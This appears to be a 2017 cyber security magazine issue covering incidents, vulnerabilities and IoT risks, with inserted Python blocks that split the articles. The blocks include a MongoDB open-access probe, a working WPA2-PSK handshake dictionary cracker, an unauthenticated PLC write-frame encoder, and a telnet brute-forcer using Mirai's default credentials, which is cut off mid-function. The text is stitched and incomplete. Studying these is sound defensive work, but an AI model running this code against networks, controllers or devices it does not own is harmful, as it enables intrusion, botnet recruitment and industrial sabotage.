Cyber world new version


Hello. Welcome to the February 2017 edition of Cyber World, the monthly magazine that brings you the latest news in the world of cyber security. We bring you analyses from leading industry professionals, academics and rising stars in the industry, together with a roundup of the latest industry news, the latest vulnerabilities and threat intelligence. In this edition, we are proud to present a special guest contribution by DarkMatter founder and CEO, Mr Faisal Al Bannai. We are also excited to publish analyses by Daryl Flack, co-founder and CIO of Blockphish and security lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). We also have an article by Kevin Murphy, a cyber security, risk and privacy specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter, and one by Talal Rajab, Head of Programme for Cyber and National Security at techUK. This edition also includes an analysis of ‘IoT - Security Issues in Factory Automation and Control’ as well as an interview with Rising Star Siming Wei, a cyber security senior associate at PwC. As always, we thank all our readers for their interest and valuable feedback, and we look forward to your continued engagement with our magazine. If you enjoy this magazine, feel free to share it with your friends and colleagues; your feedback is always welcome.

Laith Gharib, Managing Director


Major Incidents
Rounding up the news

Siblings Arrested Over Italian Elites’ Hack

Police have arrested a brother and sister in Italy who are suspected of having targeted the communications of former Italian PM Matteo Renzi, former PM Mario Monti, Mario Draghi, the head of the European Central Bank, a cardinal and many other VIPs.

The pair was caught when they sent a phishing email to a security researcher, who turned it over to the police.

The Guardian reports that the hackers stole financial information and then used it ‘in order to make financial gains’, presumably in the financial markets, since there is no evidence of blackmail or of them having sold this data.

Hackers Seize Exposed MongoDB Databases

MongoDB is a document database that stores records as JSON-like documents (BSON) and is popular with JavaScript programmers because its shell and tooling are JavaScript-based. The problem is the default installation: authentication is not enabled, and older packages also listened on every network interface, so an instance started with default settings and reachable from the internet accepts any connection as an administrator.

Researcher Niall Merrigan has now reported that hackers have seized 28,000 of these and held them for ransom. The attackers find exposed databases by port-scanning for TCP 27017 or by querying Shodan, the search engine that indexes internet-facing services. They delete all the data and leave a single record containing an email address to which the victim is to send payment to get the data back. Paying is a poor bet: several groups were hitting the same servers and overwriting each other’s ransom notes, and many never copied the data before deleting it. The check is simple: from outside your network, run mongo --host <address> --eval 'db.adminCommand({listDatabases: 1})' against your instance; if it returns a list of databases rather than an authorisation error, it is exposed. The fix is to enable authorization in the security section of mongod.conf, create real users, and restrict bindIp to the interfaces that need it.
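As an added example (not code from the page, from MongoDB or from any published scanner), here is the probe that finds an instance like the ones in the MongoDB story above: it hand-encodes the BSON for {listDatabases: 1}, sends it in a legacy OP_QUERY to admin.$cmd, which is the command form mongod accepted in 2017 (servers from 5.1 onwards require OP_MSG for most commands), and classifies the reply as open or authentication-required using the server’s own error code 13 (Unauthorized). The replies used to exercise the classifier are constructed in code, not captured. The probe function needs a live host, so point it only at instances you own.

```python
import socket
import struct
from typing import Dict, Iterator, Tuple

OP_REPLY, OP_QUERY = 1, 2004

# Minimal BSON element encoders (enough for the command and for constructed replies).
def bson_int32(key: str, value: int) -> bytes:
    return b"\x10" + key.encode() + b"\x00" + struct.pack("<i", value)

def bson_double(key: str, value: float) -> bytes:
    return b"\x01" + key.encode() + b"\x00" + struct.pack("<d", value)

def bson_string(key: str, value: str) -> bytes:
    raw = value.encode() + b"\x00"
    return b"\x02" + key.encode() + b"\x00" + struct.pack("<i", len(raw)) + raw

def bson_array(key: str, doc: bytes) -> bytes:
    return b"\x04" + key.encode() + b"\x00" + doc

def bson_doc(*elements: bytes) -> bytes:
    body = b"".join(elements)
    return struct.pack("<i", len(body) + 5) + body + b"\x00"

def build_list_databases_query(request_id: int = 1) -> bytes:
    """OP_QUERY to admin.$cmd carrying {listDatabases: 1}: flags, namespace, skip, return count, query doc."""
    body = (struct.pack("<i", 0) + b"admin.$cmd\x00" + struct.pack("<ii", 0, -1)
            + bson_doc(bson_int32("listDatabases", 1)))
    return struct.pack("<iiii", 16 + len(body), request_id, 0, OP_QUERY) + body

def top_level_elements(doc: bytes) -> Iterator[Tuple[str, int, bytes]]:
    """Yield (key, type, raw value) for each top-level BSON element of a type we know how to size."""
    pos, end = 4, struct.unpack_from("<i", doc)[0] - 1
    while pos < end:
        etype = doc[pos]
        key_end = doc.index(b"\x00", pos + 1)
        key, pos = doc[pos + 1:key_end].decode(), key_end + 1
        if etype in (0x01, 0x12):      # double, int64
            size = 8
        elif etype == 0x10:            # int32
            size = 4
        elif etype == 0x08:            # bool
            size = 1
        elif etype == 0x0A:            # null
            size = 0
        elif etype == 0x02:            # string: int32 length + bytes
            size = 4 + struct.unpack_from("<i", doc, pos)[0]
        elif etype in (0x03, 0x04):    # embedded document / array: length includes itself
            size = struct.unpack_from("<i", doc, pos)[0]
        else:
            return                      # unsupported type: stop rather than mis-parse
        yield key, etype, doc[pos:pos + size]
        pos += size

def classify_reply(reply: bytes) -> str:
    """'open' if the server listed databases without credentials, 'auth-required' if it refused, else 'unknown'."""
    if len(reply) < 36 or struct.unpack_from("<i", reply, 12)[0] != OP_REPLY:
        return "unknown"
    if struct.unpack_from("<i", reply, 32)[0] < 1:       # numberReturned
        return "unknown"
    fields: Dict[str, Tuple[int, bytes]] = {k: (t, v) for k, t, v in top_level_elements(reply[36:])}
    if fields.get("databases", (None,))[0] == 0x04:
        return "open"
    code = fields.get("code")
    if code and code[0] == 0x10 and struct.unpack("<i", code[1])[0] == 13:
        return "auth-required"
    return "unknown"

def build_reply(doc: bytes, response_to: int = 1) -> bytes:
    """Constructed OP_REPLY (header, responseFlags, cursorID, startingFrom, numberReturned) for offline tests."""
    body = struct.pack("<iqii", 0, 0, 0, 1) + doc
    return struct.pack("<iiii", 16 + len(body), 7, response_to, OP_REPLY) + body

def probe(host: str, port: int = 27017, timeout: float = 3.0) -> str:
    """Send the query to a live mongod and classify the answer. Only use against hosts you own."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_list_databases_query())
        data = s.recv(4)
        if len(data) < 4:
            return "unknown"
        total = struct.unpack("<i", data)[0]
        while len(data) < total:
            chunk = s.recv(total - len(data))
            if not chunk:
                break
            data += chunk
    return classify_reply(data)
```

An instance that answers "open" to this is exactly what the ransom crews were harvesting; one that answers "auth-required" has authorization enabled, which is the state to aim for even behind a firewall.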


CYBER WORLD


UK Healthcare System Comes Under Attack

Last October the Northern Lincolnshire and Goole NHS (National Health Service) Foundation Trust was infected with the Globe2 ransomware. Hundreds of operations and appointments had to be cancelled while the hospitals shut down their computers to contain the infection and work out what to do. An audit showed that many hospitals are still using Microsoft Windows XP, which Microsoft stopped patching in 2014. Barts Health NHS Trust in London, the largest in the UK, reportedly also suffered a ransomware attack on 13 January and took several drives offline as a precaution. In an official statement, however, the Trust denied that the IT problems it experienced resulted from ransomware.

Encoded HTML Phishing Attack on Netflix

FireEye reports that a phishing campaign is harvesting Netflix customers’ payment card details. The victim receives an email asking them to update their Netflix account information; the linked page is delivered as an encoded, AES-encrypted payload that JavaScript decrypts and renders in the browser only once the page opens, so text-based scanners that fetch the page see no phishing markup. To stay off blacklists, the kit also returns an HTTP 404 error when the visitor arrives by following a link from certain large sites, including google.com, which is how scanners and security researchers tend to reach it.

FEBRUARY 2017



Ukraine Power Grid Attacked Again
The power grid in Ukraine, which had already been attacked in December 2015, was attacked again in December 2016. The latest attack caused a power cut in the capital, Kiev, on the night of 17 December, taking out roughly a fifth of the city’s power consumption at that hour. The 2015 attack was blamed on Russia, according to the BBC, and ISSP, the security firm hired to investigate the latest incident, says the two hacks are related.

Yahoo Hack Impacts Merger
News has spread across the globe that hackers stole data on 1 billion Yahoo user accounts, in a breach dating from 2013 that Yahoo disclosed only in December 2016. Regulators at the SEC (the Securities and Exchange Commission) now want to know why Yahoo kept that information secret for so long. Questions have been raised about whether the failure affects Yahoo’s pending acquisition by Verizon; news reports claim that Verizon wants to lower the purchase price by $1 billion as a result.

San Francisco Train System Hacked
Hackers attacked the ticket machines of the San Francisco Municipal Transportation Agency’s Muni rail system, changing their displays to read “You Hacked, ALL Data Encrypted”. Fortune magazine wrote to the email address the attackers left behind. They replied that the transportation agency was running equipment as old as Windows 2000 and so was an easy target, and claimed to have taken 30 GB of accounting, payroll, email and other data.








Vulnerabilities
Latest Developments and Trends

Deeper Dive — Aircrack-ng
Deeper Dive looks at an attack vector or vulnerability and seeks to better understand how hackers operate and what the best practices are. The topic of this edition is Aircrack-ng, the wireless network auditing suite whose development started in 2006 as a fork of the original aircrack. Its main application is recovering the key of a wireless network, and the method depends on which of two families the network belongs to: WEP, or WPA/WPA2. Against WEP, aircrack-ng does not guess the key at all: it collects large numbers of encrypted frames together with their initialisation vectors (IVs), and a statistical attack on the RC4 key stream recovers the key outright. The number of IVs needed depends on the key length; it is estimated that around 20,000 packets are required for a 64-bit WEP key and up to 85,000 for a 128-bit key. Because this works whatever key is chosen, WEP is broken as a protocol and should not be used at all.


Against WPA and WPA2 personal (pre-shared key) networks the picture is different. The key is derived from the passphrase and the protocol itself is not broken, so aircrack-ng falls back to a dictionary attack: it needs a capture of the four-way handshake between a client and the access point (airodump-ng records it, and aireplay-ng can deauthenticate a client to force a fresh one), then derives the keys for each candidate passphrase in a wordlist and checks whether the resulting message integrity code matches the captured one. Wordlists containing several million entries are widely available, and they also define the limit of the attack: the passphrase is only recovered if it is in the wordlist, and each guess costs 4096 rounds of PBKDF2, so a long random passphrase is out of reach. Many tutorials describe how to test your own network with aircrack-ng, and the official website (aircrack-ng.org) provides plenty of documentation and walkthroughs. Protecting wireless networks is paramount for any organisation or individual, because the wireless network is the gateway to everything behind it.
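The dictionary step above, as an added worked example that is not aircrack-ng’s code (it reimplements the same key derivation in Python): PBKDF2 turns passphrase and SSID into the PMK, the 802.11i PRF expands PMK, MAC addresses and nonces into the PTK, and the first 16 bytes of the PTK (the KCK) key the HMAC-SHA1 MIC on the second handshake message. The handshake in the example is constructed in code from a known passphrase rather than captured; the field offsets in build_eapol_msg2 follow the EAPOL-Key frame layout, the MAC addresses and nonces are made up, and the known-answer check for "password"/"IEEE" is the PBKDF2 test vector from the 802.11i standard.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenation of HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(...))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)  # KCK(16) | KEK(16) | TK(16) for CCMP


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (the client's reply) with the 16-byte MIC field at offset 81 zeroed."""
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: pairwise, MIC present, key descriptor version 2 (HMAC-SHA1)
            + b"\x00\x00"              # key length
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce                   # 32-byte supplicant nonce
            + b"\x00" * 16             # key IV
            + b"\x00" * 8              # RSC
            + b"\x00" * 8              # key ID
            + b"\x00" * 16             # MIC, zeroed for the computation
            + b"\x00\x00")             # key data length (RSN IE omitted in this constructed frame)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 (Key)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame, truncated to 16 bytes (WPA/TKIP would use HMAC-MD5)."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(handshake: Dict[str, object], wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate passphrase whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def constructed_handshake(passphrase: str, ssid: str = "TestNet") -> Dict[str, object]:
    """Stand-in for what airodump-ng would capture, generated from a known passphrase (constructed, not real)."""
    ap_mac = bytes.fromhex("001122334455")      # made-up access point address
    sta_mac = bytes.fromhex("66778899aabb")     # made-up client address
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = build_eapol_msg2(snonce)
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}
```

Every candidate costs a full PBKDF2 run, which is why real tooling precomputes PMKs per SSID or offloads the work to GPUs, and why a passphrase that is not in anyone’s wordlist is the defence.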



Eir Modem Used by Irish ISP Open to Attack

In November, a writer known only as kenzo2017 found what he calls a ‘serious bug’ in further Eir modem models, bringing the number of affected models to three. The issue is that an attacker can use the TR-069 remote-management protocol to change the modem’s settings.

TR-069 is the protocol ISPs use to reset passwords and make other changes remotely, for instance when customers call support, and it is meant to be spoken only between the modem and the ISP’s management server. The flaw is in what the modem exposes: the management interface intended for the LAN side is reachable from the public internet, so anyone on the internet can push configuration to the device. A quick check for any home router is whether its public address answers on TCP port 7547, the port TR-069 uses; if it does and you did not intend that, the device is a candidate for this class of attack.

Researchers Hack Samsung Camera

In 2014, researchers at the DEF CON conference demonstrated how to take over a Samsung camera. Samsung’s response was to remove the camera’s web interface rather than fix it. That spurred the hacker group Exploitee.rs to ‘take another crack at it’, writes Threatpost.

Exploitee.rs is not a secretive group: it lists dozens of devices on its website and publishes working code for each. The new exploit needs nothing more than a single request sent with curl to a script left behind on the camera for firmware updates. That script passes the name of the uploaded file to a shell without sanitising it, so commands appended to the filename run on the camera.




iTunes and App Store Vulnerable to Malware
Vulnerability Lab showed that a user can enter script into the field on the iTunes and App Store screen where users sign up to be notified when a new app is released. The field is supposed to hold a static string, but a coding error causes whatever is entered there to be rendered unescaped in the notification emails that Apple sends out. Because those emails come from Apple’s own servers, an attacker can sign up for notifications and have Apple deliver a message carrying his own script and phishing content to another Apple user, from a sender that user trusts.

FTC Files Injunction against D-Link
The FTC has filed a Complaint for Permanent Injunction and Other Equitable Relief against D-Link Corporation, maker of routers and IP cameras. The complaint says the ‘defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access…’, including ‘hard-coded user credentials and other backdoors and command injection flaws…’ The FTC also faults the company for storing passwords in clear text. The devices named are the N300 Router, N Dual Band Router and N Network Cameras.

New Malware Threatens Mac and Linux
Fruitfly, also known as Quimitchin, is a newly discovered but apparently old piece of malware that targets Mac systems. It was written for the Mac but also runs on Linux, since both are Unix-like and the code relies only on functions common to the two. Malwarebytes uncovered it when an infected machine was noticed making connections to a number of IP addresses: the computer was sending out screen captures. They do not know how long the code had been on the machine, but speculate it could have been there for some years, partly because the coding techniques show a limited understanding of the Mac and some very dated design choices. Apple has released a fix.








Monthly Analysis
November-December Threat Roundup

Global Distribution of Attacks
November and December saw an increase in attacks over previous months, with 74 and 103 recorded respectively. This could be due to the Christmas vacation giving attackers more time to seek out targets. The US represents only 38% of attacks over the two-month period, which shows the attacks were more widely distributed across the world, as seen for example in the increase in attacks in India.

[Charts: Global Distribution of Attacks, November-December. By country: US, UK, India, Israel, Ecuador, Global. By region: North America, Europe, Asia Pacific, Middle East, International.]


Attack Timeline
The graph to the right represents the 61 days of the two-month period, with the usual ups and downs, especially from the beginning to mid-November. There was also a slight spike in activity the week before Christmas, followed by a sharp dip on 22 December.

[Chart: Attack Timeline, November-December.]

Top Sectors Targeted
The Government sector experienced nearly twice as many breaches as the second most targeted sector, Online Services, which recorded 37 attacks. There was a significant increase in attacks in the ‘Other’ sectors category, which includes a large number of universities. The remaining categories, Healthcare, Finance and Single Individuals, experienced 23, 18 and 6 incidents respectively.




Most Used Attack Vectors

The pie chart shows a relatively even distribution of attacks across the different attack vectors. Account Hijacking was the most prominent known vector, which could be a result of the OurMine Twitter account hijackings that occurred. There was also a significant increase in DDoS attacks, with services such as Steam and Tumblr suffering outages of several hours. SQLi makes a strong return, having been absent from our December edition’s analysis.

[Pie chart: Most Used Attack Vectors, November-December; slices of 25%, 16%, 15%, 13%, 11%, 10% and 10% (slice labels not recoverable from this copy).]

Credentials Stolen
In three days alone, over 100 million credentials were leaked. Comparing the timeline with the credentials-stolen chart shows no correlation between the two, which suggests that each of these large credential dumps comes from a single breach rather than from the day-to-day volume of attacks.

[Chart: Credentials Stolen, November-December (exponential scale).]



VisDa

Take control of your data
A revolutionary complete track and trace tool that visualises and analyses data transfers to understand what, how and where information is moving, to achieve regulatory compliance.
Key Features:
• GDPR transfers compliance score
• Instantly identify high risk communications
• All files transferred across a network are stored and recorded
• All content is fully text indexed, so information can easily be accessed
• Scalable: our solution is proven on networks that operate at up to 1 Tb/s

www.secgate.co.uk/visda



Special Guest

Faisal Al Bannai




Making the Case for a Ministerial Cyber Security Appointment

About the Author: Faisal Al Bannai is Founder and Chief Executive Officer of DarkMatter, an international cyber security company based in the UAE, which is empowering digitisation globally.

In February 2016, President Obama established the Commission on Enhancing National Cyber Security with an Executive Order. The Commission completed its report on December 1, 2016, providing detailed short-term and long-term recommendations to strengthen cyber security in both the public and private sectors, while protecting privacy, fostering innovation and ensuring economic and national security. The report emphasises the need for partnerships between the public and private sectors, as well as international engagement. It also discusses the role consumers must play in enhancing the US’ digital security. The report categorises its recommendations within six overarching imperatives focused on infrastructure, investment, consumer education, workforce capabilities, government operations and requirements for a fair and open global digital economy.

The six imperatives are:

1. Protect, defend, and secure today’s information infrastructure and digital networks.
2. Innovate and accelerate investment for the security and growth of digital networks and the digital economy.
3. Prepare consumers to thrive in a digital age.
4. Build cyber security workforce capabilities.
5. Better equip government to function effectively and securely in the digital age.
6. Ensure an open, fair, competitive, and secure global digital economy.

The Commission’s recommendations are not binding, though it would be prudent to at least consider the report’s references and overviews given the broad base of expertise drawn on in the preparation of the document, including consultation with technical and policy experts, input from the public through open hearings and a request for information, and a review of the existing literature.

The heightened level of cyber threat on a national level is not just a US phenomenon but a trend that is growing across the globe, and it is high time cyber security is reflected within every government ministry and agency as a core function, with a direct reporting line to senior officials clearly defined and implemented. Securing digital infrastructure has become as important to a nation’s continued development as its choice of domestic or foreign policy, and in many ways cyber security spans both of these areas given the rise in threats emanating from within countries and those being faced from abroad. The six imperatives included in the Enhancing National Cyber Security report offer a strong framework for any progressive nation anywhere in the world to consider its cyber security posture and to take pro-active measures to improve its defences given the uncertain nature of threat actors, be they nation states or hacktivists, common criminals or other unknown adversaries. It is telling that the first imperative in the report relates to “protecting, defending, and securing today’s information infrastructure and digital networks” as a guiding requirement, given we believe this is the key factor in creating a trusted and sustainable digital environment in which all participants have the confidence to invest and prosper. This imperative is aligned to the Cyber Security Life-Cycle, which advises planning for, detecting, protecting against and recovering from incidents affecting digital assets in order to mitigate the threat of a cyber incident. A holistic, end-to-end approach to cyber security is the most effective way to counter the ever-expanding cyber threat landscape, as it is clear that preventing or avoiding every cyber incident is just not possible.








Third Party Risk Management. Do you:
• rely on third parties to deliver services to clients?
• trust third parties with your company’s confidential data?
• integrate networks, systems or applications with third party solutions?
• assess your suppliers for their criticality?

We will:
• build you an operating model to identify and reduce third party risk;
• implement an end-to-end third party risk management process within your business;
• manage and deliver your third party assurance programme;
• support your supplier criticality assessments.

Get in touch for a free consultation info@secgate.co.uk



IoT — Security Issues in Factory Automation and Control

In October an IoT DDoS attack against Dyn, a managed DNS provider, made Netflix, Twitter, Amazon and other high-profile sites unreachable across large parts of the USA for several hours. Dyn does not host those sites; it answers the DNS queries that turn their names into addresses, so when its servers could not respond, browsers could not find the sites. The attackers built their botnet by logging in to IP cameras and DVRs with the default user ID and password built into the devices, the kind of equipment that also sits on factory floors. This open IoT component was a large security hole that not many people had thought about before: cyber defences have traditionally focused on hardening the IT systems in the plant, not the automation devices themselves.


Here we look at that exploit, and more generally at the nature of IoT in the factory.

FACTORY AUTOMATION

There are two sides to IoT in the factory: factory automation, and the sensor-driven IP devices operating across wired and wireless networks. The second is what we usually think of when we write about IoT. But if you talk to engineers who programme PLC devices, they will tell you that they have been doing IoT for decades. The only thing new is the name assigned to it.
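As an added illustration, not taken from the page, from Rockwell or from RSLogix, of what talking to such a PLC over a serial link looks like at the byte level: a minimal encoder and decoder for Allen-Bradley DF1 full-duplex frames (DLE STX, payload with every DLE doubled, DLE ETX, block check character) carrying a ‘protected typed logical write’ to an integer file. The command-byte layout follows our reading of the published DF1 specification; the node addresses, transaction number and values are made up for the example. The point to notice is what is absent: nothing in the frame identifies or authenticates the sender, so anyone who can reach the serial port, or the gateway that bridges it to Ethernet, can write setpoints.

```python
import struct
from typing import Dict, List

# DF1 full-duplex control characters
DLE, STX, ETX = 0x10, 0x02, 0x03

# Command/function codes for the SLC-style "protected typed logical" operations with three address fields
CMD_PROTECTED_TYPED = 0x0F
FNC_LOGICAL_READ_3ADDR = 0xA2
FNC_LOGICAL_WRITE_3ADDR = 0xAA
FILE_TYPE_INTEGER = 0x89      # file type code for N (16-bit integer) files


def bcc(payload: bytes) -> int:
    """Block check character: two's complement of the 8-bit sum of the unstuffed payload bytes."""
    return (-sum(payload)) & 0xFF


def encode_frame(payload: bytes) -> bytes:
    """DLE STX <payload, DLE doubled> DLE ETX BCC."""
    stuffed = payload.replace(bytes([DLE]), bytes([DLE, DLE]))
    return bytes([DLE, STX]) + stuffed + bytes([DLE, ETX, bcc(payload)])


def decode_frame(frame: bytes) -> bytes:
    """Reverse of encode_frame; raises ValueError on a framing error or BCC mismatch."""
    if frame[:2] != bytes([DLE, STX]):
        raise ValueError("missing DLE STX")
    payload = bytearray()
    i = 2
    while i < len(frame):
        b = frame[i]
        if b != DLE:
            payload.append(b)
            i += 1
            continue
        nxt = frame[i + 1] if i + 1 < len(frame) else None
        if nxt == DLE:                      # stuffed data byte 0x10
            payload.append(DLE)
            i += 2
        elif nxt == ETX:                    # end of frame, BCC follows
            if i + 2 >= len(frame):
                raise ValueError("missing BCC")
            if frame[i + 2] != bcc(payload):
                raise ValueError("BCC mismatch")
            return bytes(payload)
        else:
            raise ValueError("bad DLE sequence")
    raise ValueError("missing DLE ETX")


def command(dst: int, src: int, cmd: int, tns: int, fnc: int, data: bytes) -> bytes:
    """Command message body: DST SRC CMD STS TNS(lo, hi) FNC data. STS is 0 in a request."""
    return bytes([dst, src, cmd, 0, tns & 0xFF, (tns >> 8) & 0xFF, fnc]) + data


def write_integers(dst: int, src: int, tns: int, file_number: int, element: int, values: List[int]) -> bytes:
    """Frame a write of 16-bit integers to N<file_number>:<element> (byte size, file, type, element, sub-element)."""
    body = bytes([2 * len(values), file_number, FILE_TYPE_INTEGER, element, 0])
    body += b"".join(struct.pack("<h", v) for v in values)
    return encode_frame(command(dst, src, CMD_PROTECTED_TYPED, tns, FNC_LOGICAL_WRITE_3ADDR, body))


def parse_write(frame: bytes) -> Dict[str, object]:
    """Decode a write frame back into its fields; what a passive tap on the serial line would see."""
    p = decode_frame(frame)
    dst, src, cmd, sts, tns_lo, tns_hi, fnc = p[:7]
    size, file_number, file_type, element, sub_element = p[7:12]
    values = [struct.unpack_from("<h", p, 12 + 2 * i)[0] for i in range(size // 2)]
    return {"dst": dst, "src": src, "cmd": cmd, "sts": sts, "tns": tns_lo | (tns_hi << 8), "fnc": fnc,
            "file": file_number, "type": file_type, "element": element, "sub_element": sub_element,
            "values": values}
```

The BCC catches line noise, not tampering: anyone who can inject bytes can recompute it. That is why the only real controls are physical access to the serial side and strict isolation of whatever gateway exposes DF1 on Ethernet.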



True. Yet the difference is that today there is the cloud, big data databases and analytics. Programming a serial or Ethernet PLC to control a lathe, welding machine or painting machine, however, is still the old-fashioned business of writing ladder logic in desktop software such as RSLogix for Allen-Bradley PLCs. It has nothing to do with writing web services or using a general-purpose programming language. Instead, the programmer addresses memory in the controller by ‘file’: a file type and number (N7 is integer file 7, F8 a floating-point file), an element number within that file and, for structured types such as timers and counters, a sub-element. On the wire, in Allen-Bradley’s DF1 protocol, a command to read or write such a location carries a command code, a function code, a byte count and those address fields, followed by the values themselves as 16-bit words. These are simple operations (read a register, write a setpoint, start, stop, change a baud rate) that together describe a complete industrial process. Industrial gateways convert this serial or Ethernet traffic for other serial or Ethernet devices and for the management cloud. It is tempting to assume no hacker would bother with any of this, since attackers are focused on PC hardware and network devices. Yet attacking PLC devices is exactly what the




American spy agencies allegedly did in 2010. Stuxnet is said to have targeted the Siemens PLCs that ran the centrifuges in Iran’s uranium enrichment facilities. It reached the Windows engineering workstations through infected USB drives and Windows vulnerabilities rather than through a phishing email, and from there modified the PLC code so that the centrifuges were driven at speeds that damaged them, while the operators were shown normal readings. That wildly effective, daring operation dealt a huge blow to Iran’s nuclear programme.

SENSOR-DRIVEN IOT

The other side of IoT is sensors deployed for preventive maintenance, predictive models, measuring uptime and gathering the data that drives changes to the line: adding assembly and sub-assembly stations, adding shift operators, improving training and altering material flow. Acoustic sensors ping parts and measure resonance to test the quality of materials and of the completed

product. Transducers convert mechanical energy into electrical signals to measure vibration; rising vibration indicates when a machine needs new filters, maintenance or calibration. Plants count items with cameras to measure operator and station productivity, and monitor emissions, temperature, humidity, ambient light and so on. All of this data is used to operate the plant in real time and, through offline, after-the-fact analysis with planning software built for the purpose, to fine-tune the factory floor and make changes to the assembly line.

IP CAMERA EXPLOIT

The October attack was carried out through IoT devices whose Chinese manufacturer has since recalled and replaced some of them. Hackers planted the Mirai DDoS malware in IP cameras and DVRs made by XiongMai Technologies,



and unleashed reportedly up to 1.4 Tbps of DNS traffic at Dyn’s infrastructure (Dyn itself has not confirmed a figure), more than its servers could answer, which took them offline. IP cameras are connected directly to the IP network, so there was no need to attack an industrial wireless or non-Ethernet wired protocol, as there would be for an industrial controller; the same IP connectivity is what let the attackers find the devices in the first place, by scanning. Implanting the malware was trivial because the devices still had the default user ID and password, which in XiongMai’s case was hard-coded into the firmware, and the telnet (and, where enabled, SSH) service that accepted it was reachable from the internet. In its analysis of the attack, Dyn put its finger on the problem: “During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic.” Despite its efforts to surge bandwidth and shape traffic, two successive waves of attacks overwhelmed its systems for several hours.

The source code for Mirai is freely available on the internet, so the attackers did not have to write anything new. Dyn reported that one source of the attack traffic was devices infected with Mirai; whether other botnets took part, and whether that points to a more sophisticated operator, warrants further analysis. The same botnet had already been used earlier in 2016 against the security blog KrebsOnSecurity and the French ISP and hosting company OVH. Different parties have claimed responsibility, although no group has yet been confirmed as the actual culprit. The consensus is that this was not state-sponsored.
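An added example, not code from Mirai, from Dyn or from the page, of the check a plant or network owner can run against their own cameras and DVRs: it speaks just enough telnet to answer option negotiation, watches for the login, password and shell prompts, and tries a subset of the username/password pairs hard-coded in the published Mirai scanner source. The network function needs a live device and must only be pointed at equipment you are authorised to test; the prompt handling is exercised on constructed byte strings.

```python
import socket
from typing import List, Tuple

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251

# Subset of the username/password pairs from the published Mirai scanner source (scanner.c).
MIRAI_DEFAULTS: List[Tuple[str, str]] = [
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", ""),
    ("admin", "password"), ("root", "root"), ("user", "user"), ("admin", "1111"),
]


def strip_iac(data: bytes) -> Tuple[bytes, bytes]:
    """Remove telnet option negotiation from data.
    Returns (cleartext, replies): every DO is answered WONT and every WILL is answered DONT,
    so the device settles for a plain 8-bit stream; IAC IAC is a literal 0xFF byte."""
    text, replies = bytearray(), bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            text.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            break
        verb = data[i + 1]
        if verb in (DO, DONT, WILL, WONT) and i + 2 < len(data):
            opt = data[i + 2]
            if verb == DO:
                replies += bytes([IAC, WONT, opt])
            elif verb == WILL:
                replies += bytes([IAC, DONT, opt])
            i += 3
        elif verb == IAC:
            text.append(IAC)
            i += 2
        else:
            i += 2                      # other two-byte commands such as NOP or GA
    return bytes(text), bytes(replies)


def classify_prompt(text: bytes) -> str:
    """Map what the device printed to 'failed', 'password', 'login', 'shell' or 'unknown'."""
    t = text.lower()
    if b"incorrect" in t or b"login failed" in t or b"invalid" in t:
        return "failed"
    if b"password:" in t:
        return "password"
    if b"login:" in t or b"username:" in t:
        return "login"
    if b"busybox" in t or t.rstrip().endswith((b"#", b"$", b">")):
        return "shell"
    return "unknown"


def try_login(host: str, user: str, password: str, port: int = 23, timeout: float = 5.0) -> bool:
    """Attempt one telnet login; True only if a shell prompt follows the credentials."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        sent_user = sent_pass = False
        for _ in range(8):               # bounded number of reads per attempt
            try:
                raw = s.recv(4096)
            except socket.timeout:
                return False
            if not raw:
                return False
            text, replies = strip_iac(raw)
            if replies:
                s.sendall(replies)
            state = classify_prompt(text)
            if state == "failed":
                return False
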